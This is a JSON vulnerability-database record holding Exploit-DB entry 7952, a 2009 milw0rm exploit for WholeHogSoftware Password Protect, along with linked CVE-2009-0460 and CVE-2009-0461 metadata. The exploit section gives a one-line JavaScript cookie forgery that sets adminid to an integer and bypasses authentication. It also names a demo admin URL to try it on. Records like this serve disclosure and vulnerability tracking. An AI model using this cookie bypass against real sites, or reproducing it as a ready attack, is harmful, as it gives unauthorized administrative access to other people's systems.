{"published": "2009-02-03T00:00:00", "id": "EDB-ID:7952", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 10.0}, "hash": "3f9941be3924510efe026c9880eaf46b9eda9fff8ae2daa0c4b784b1e8777751", "description": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/7952/", "lastseen": "2016-02-01T03:24:46", "edition": 1, "title": "WholeHogSoftware Password Protect Insecure Cookie Handling Vuln", "osvdbidlist": ["51734"], "modified": "2009-02-03T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "sourceHref": "https://www.exploit-db.com/download/7952/", "references": [], "reporter": "Stack", "sourceData": "###########################################################################\n[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability\n[+] Script :Password Protect\n[+] Site :http://wholehogsoftware.com\n[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced\n[+] Discovered By Mountassif Moad \n \n[+] www.v4-team.com \n \n[+] Greetz : All my Freind\n###########################################################################\nExploit:\njavascript:document.cookie = \"adminid=8; path=/\";\nDeMo :\nhttp://www.wholehogsoftware.com/demo/password_protect_enhanced/admin\n\n# milw0rm.com [2009-02-03]\n", "objectVersion": "1.0"}

{"result": {"cve": [{"id": "CVE-2009-0460", "type": "cve", "title": "CVE-2009-0460", "description": "Whole Hog Ware Support 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "published": "2009-02-10T02:00:24", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0460", "cvelist": ["CVE-2009-0460"], "lastseen": "2017-10-19T11:13:31"}, {"id": "CVE-2009-0461", "type": "cve", "title": "CVE-2009-0461", "description": "Whole Hog Password Protect: Enhanced 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.", "published": "2009-02-10T02:00:24", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0461", "cvelist": ["CVE-2009-0461"], "lastseen": "2017-10-19T11:13:31"}], "exploitdb": [{"id": "EDB-ID:7951", "type": "exploitdb", "title": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability", "description": "WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability. CVE-2009-0460,CVE-2009-0461. Webapps exploit for php platform", "published": "2009-02-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7951/", "cvelist": ["CVE-2009-0460", "CVE-2009-0461"], "lastseen": "2016-02-01T03:24:37"}]}}